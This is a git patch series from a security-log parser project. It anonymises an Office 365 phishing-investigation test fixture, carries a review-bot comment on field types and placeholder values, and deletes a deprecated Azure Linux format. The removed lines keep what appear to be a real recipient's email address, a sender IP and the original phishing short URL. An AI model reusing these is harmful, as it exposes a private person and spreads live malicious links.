urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's 
mailbox.\\\"}\",\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:012345a6789bcd0e1f23a4b5cd678ef9\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"01a2bcd3-efab-4c56-7890-12defa3bc4d\\\",\\\"0123a456-b789-0cd1-e23f-45abcd6ef78\\\",\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"01a2b345-67c8-9012-345d-67efabc8d90e\\\",\\\"01a234b5-6789-012c-3d4e-56fabcd7ef8\\\",\\\"a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6\\\",\\\"0a1b23c4-567d-8901-2345-67efabc8d90a\\\",\\\"0123a4b5-678c-9d0e-1f23-45abcde6fa78\\\",\\\"0a1b234c-5678-90d1-2efa-34bcdef5a6b7\\\",\\\"0123a4bc-5d6e-78f9-0123-45abcde67890\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://test.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://test.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 
AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a0123b4c5678def901234a5b67cde890\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"RelatedAlertIds\\\":[\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"],\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"EndTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"TimeGenerated\\\":\\\"2024-09-02T03:16:43.91Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"URLList\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"8a5bf71a-d9e4-422e-8bdb-33272de66983\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"InvestigationStatus\\\":\\\"Pending\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\"],\\\"Intent
\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fa01234567-89a0-1234-5b67-89cdefa0b12\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Recipient\\\":\\\"user@mailbox.com\\\",\\\"Urls\\\":[\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"https://website.net/up/24/35/image.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"sender@test.integration.com\\\",\\\"P1Sender\\\":\\\"p1sender@test.integration.com\\\",\\\"P1SenderDomain\\\":\\\"test.integration.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"sender@test.integration.com\\\",\\\"P2SenderDisplayName\\\":\\\"P2 name\\\",\\\"P2SenderDomain\\\":\\\"test.integration.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"Subject of the mail\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message 
moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:01abc23d456efa7bc8901234d5efa67b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"4\\\",\\\"MailboxPrimaryAddress\\\":\\\"user@mailbox.com\\\",\\\"Upn\\\":\\\"user@mailbox.com\\\",\\\"AadId\\\":\\\"0123ac45-6c7d-e89f-a0123b45c6d7\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:1a2b3456c7defabc8901d2e3fa456789\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"5\\\",\\\"Url\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":12,\\\"Urn\\\":\\\"urn:UrlEntity:0123a4567b8c9de0fa123bcde4f5a6b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"6\\\",\\\"NetworkMessageIds\\\":[\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Subject of the mail\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND 
NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Subject of the mail;1.2.3.4;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:01a2bc345678de901f2a34b567cdef89\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"7\\\",\\\"NetworkMessageIds\\\":[\\\"01a2bcd3-efab-4c56-7890-12defa3bc4d\\\",\\\"0123a456-b789-0cd1-e23f-45abcd6ef78\\\",\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"01a2b345-67c8-9012-345d-67efabc8d90e\\\",\\\"01a234b5-6789-012c-3d4e-56fabcd7ef8\\\",\\\"a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6\\\",\\\"0a1b23c4-567d-8901-2345-67efabc8d90a\\\",\\\"0123a4b5-678c-9d0e-1f23-45abcde6fa78\\\",\\\"0a1b234c-5678-90d1-2efa-34bcdef5a6b7\\\",\\\"0123a4bc-5d6e-78f9-0123-45abcde67890\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://test.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND 
NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://test.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a0123b4c5678def901234a5b67cde890\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Subject of the mail\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"test.integration.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND 
NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Subject of the mail;test.integration.com;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:7350e5b982beaa3846d327a005dd57d6\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"EndTimeUtc\":\"2024-09-02T03:33:31\",\"InvestigationId\":\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"InvestigationType\":\"ZappedUrlInvestigation\",\"LastUpdateTimeUtc\":\"2024-09-02T03:28:24\",\"RunningTime\":771,\"StartTimeUtc\":\"2024-09-02T03:20:40\",\"Status\":\"Pending Action\"}", "event": { "action": "AirInvestigationData", "code": "64", 
@@ -23,24 +23,24 @@
 "attachments": [],
 "from": {
 "address": [
- "support.33@wdezd.ersdz.meradebo.com"
+ "sender@test.integration.com"
 ]
 },
 "to": {
 "address": [
- "ggravier@ixina.com"
+ "user@mailbox.com"
 ]
 }
 },
 "host": {
- "name": "AM7EUR03BG406"
+ "name": "MACHINE01"
 },
 "log": {
 "level": "Informational"
 },
 "office365": {
 "audit": {
- "object_id": "8217bd67-1368-4213-b6be-498cdbff1542"
+ "object_id": "1234ab56-7890-1234-c5de-678fabcd9012"
 },
 "investigation": {
 "alert": {
@@ -63,22 +63,39 @@
 "email": {
 "sender": {
 "domains": [
- "wdezd.ersdz.meradebo.com"
+ "test.integration.com"
 ],
 "ip": [
- "40.107.244.101"
+ "1.2.3.4"
 ]
 },
 "subjects": [
- "\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b"
+ "Subject of the mail"
 ],
 "urls": [
- "https://zpr.io/TUZAu6VrAvQT",
- "https://zupimages.net/up/24/35/1itk.png"
+ "https://test.io/TUZAu6VrAvQT",
+ "https://website.net/up/24/35/image.png"
 ]
 },
- "id": "urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8",
- "name": "Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8",
+ "emails": [
+ {
+ "message_ids": "['01a2bcd3-efab-4c56-7890-12defa3bc4d', '0123a456-b789-0cd1-e23f-45abcd6ef78', 'ab12cde3-f456-789a-01bc-23defa4bc5d', '01a2b345-67c8-9012-345d-67efabc8d90e', '01a234b5-6789-012c-3d4e-56fabcd7ef8', 'a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6', '0a1b23c4-567d-8901-2345-67efabc8d90a', '0123a4b5-678c-9d0e-1f23-45abcde6fa78', '0a1b234c-5678-90d1-2efa-34bcdef5a6b7', '0123a4bc-5d6e-78f9-0123-45abcde67890']"
+ },
+ {
+ "delivery": {
+ "action": "DeliveredAsSpam",
+ "location": "JunkFolder",
+ "original_location": "Inbox"
+ },
+ "direction": "Inbound",
+ "language": "en",
+ "message_ids": [
+ "ab12cde3-f456-789a-01bc-23defa4bc5d"
+ ]
+ }
+ ],
+ "id": "urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9",
+ "name": "Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9",
 "status": "Pending Action",
 "threats": [
 "['ZapPhish', 'NormalPhish']"
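Review bot: The new `emails` array pins two different shapes for `message_ids` — the first element holds a string containing a Python list repr (`"['01a2bcd3-…', …]"`) while the second holds a JSON array — and `threats` likewise carries a stringified list inside an array, so a consumer cannot iterate either field without first checking its type. This file is only an expectation, so the inconsistency presumably comes from the parser stage that fills these fields, which is outside this hunk; the fixture should be updated once that stage emits a real array rather than freezing the stringified form as correct. The anonymised replacement values are also not reserved for documentation (`1.2.3.4`, `test.integration.com`, `test.io`, `website.net`, and `mailbox.com` in the -23 hunk); RFC 5737 `192.0.2.0/24` addresses and RFC 2606 `example.com` / `.example` names would keep fixtures from referring to live hosts. Finally, several replacement identifiers lost the shape of the originals: `ab12cde3-f456-789a-01bc-23defa4bc5d` ends in an 11-character group, the new investigation id is 30 hex characters where the old one was 32, and `organization.id` in the -92 hunk opens with a 9-character group, which matters if anything downstream validates UUID formats.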
@@ -92,7 +109,7 @@
 }
 },
 "organization": {
- "id": "275ae857-f201-4a2e-8f43-d48391c56871"
+ "id": "123abc456-d789-0e1f-2a34-b56789c01234"
 },
 "related": {
 "user": [
From c741928dc4d979457ce55831b25235dd107c4737 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc Date: Thu, 17 Oct 2024 10:09:28 +0200 Subject: [PATCH 159/317] chore(Azure): remove the Azure linux format as it's deprecated --- Azure/azure-linux/CHANGELOG.md | 8 - Azure/azure-linux/_meta/fields.yml | 4 - Azure/azure-linux/_meta/logo.png | Bin 35750 -> 0 bytes Azure/azure-linux/_meta/manifest.yml | 13 - .../azure-linux/_meta/smart-descriptions.json | 24 -- Azure/azure-linux/ingest/parser.yml | 257 ------------------ .../tests/auth_conversation_failed.json | 28 -- Azure/azure-linux/tests/auth_no_identity.json | 36 --- Azure/azure-linux/tests/cron_command1.json | 35 --- Azure/azure-linux/tests/cron_command2.json | 34 --- Azure/azure-linux/tests/disconnected.json | 33 --- Azure/azure-linux/tests/omsagent_command.json | 39 --- .../azure-linux/tests/omsagent_command2.json | 39 --- Azure/azure-linux/tests/session_closed.json | 36 --- Azure/azure-linux/tests/session_opened.json | 36 --- Azure/azure-linux/tests/systemd_session.json | 36 --- 16 files changed, 658 deletions(-) delete mode 100644 Azure/azure-linux/CHANGELOG.md delete mode 100644 Azure/azure-linux/_meta/fields.yml delete mode 100644 Azure/azure-linux/_meta/logo.png delete mode 100644 Azure/azure-linux/_meta/manifest.yml delete mode 100644 Azure/azure-linux/_meta/smart-descriptions.json delete mode 100644 Azure/azure-linux/ingest/parser.yml delete mode 100644 Azure/azure-linux/tests/auth_conversation_failed.json delete mode 100644 Azure/azure-linux/tests/auth_no_identity.json delete mode 100644 Azure/azure-linux/tests/cron_command1.json delete mode 100644 Azure/azure-linux/tests/cron_command2.json delete mode 100644 Azure/azure-linux/tests/disconnected.json delete mode 100644 Azure/azure-linux/tests/omsagent_command.json delete mode 100644 Azure/azure-linux/tests/omsagent_command2.json delete mode 100644 Azure/azure-linux/tests/session_closed.json delete mode 100644 Azure/azure-linux/tests/session_opened.json delete mode 100644 Azure/azure-linux/tests/systemd_session.json 
diff --git a/Azure/azure-linux/CHANGELOG.md b/Azure/azure-linux/CHANGELOG.md
deleted file mode 100644
index 11bddf32c..000000000
--- a/Azure/azure-linux/CHANGELOG.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# Changelog
-
-All notable changes to this project will be documented in this file.
-
-The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
-and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
-
-## [Unreleased]
diff --git a/Azure/azure-linux/_meta/fields.yml b/Azure/azure-linux/_meta/fields.yml
deleted file mode 100644
index f00c8f7ec..000000000
--- a/Azure/azure-linux/_meta/fields.yml
+++ /dev/null
@@ -1,4 +0,0 @@
-azure_linux.message:
- description: The linux message
- name: azure_linux.message
- type: keyword
diff --git a/Azure/azure-linux/_meta/logo.png b/Azure/azure-linux/_meta/logo.png deleted file mode 100644 index d7e99ac573786fdf6a9acd3fcb1fa14a049f915f..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 35750 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 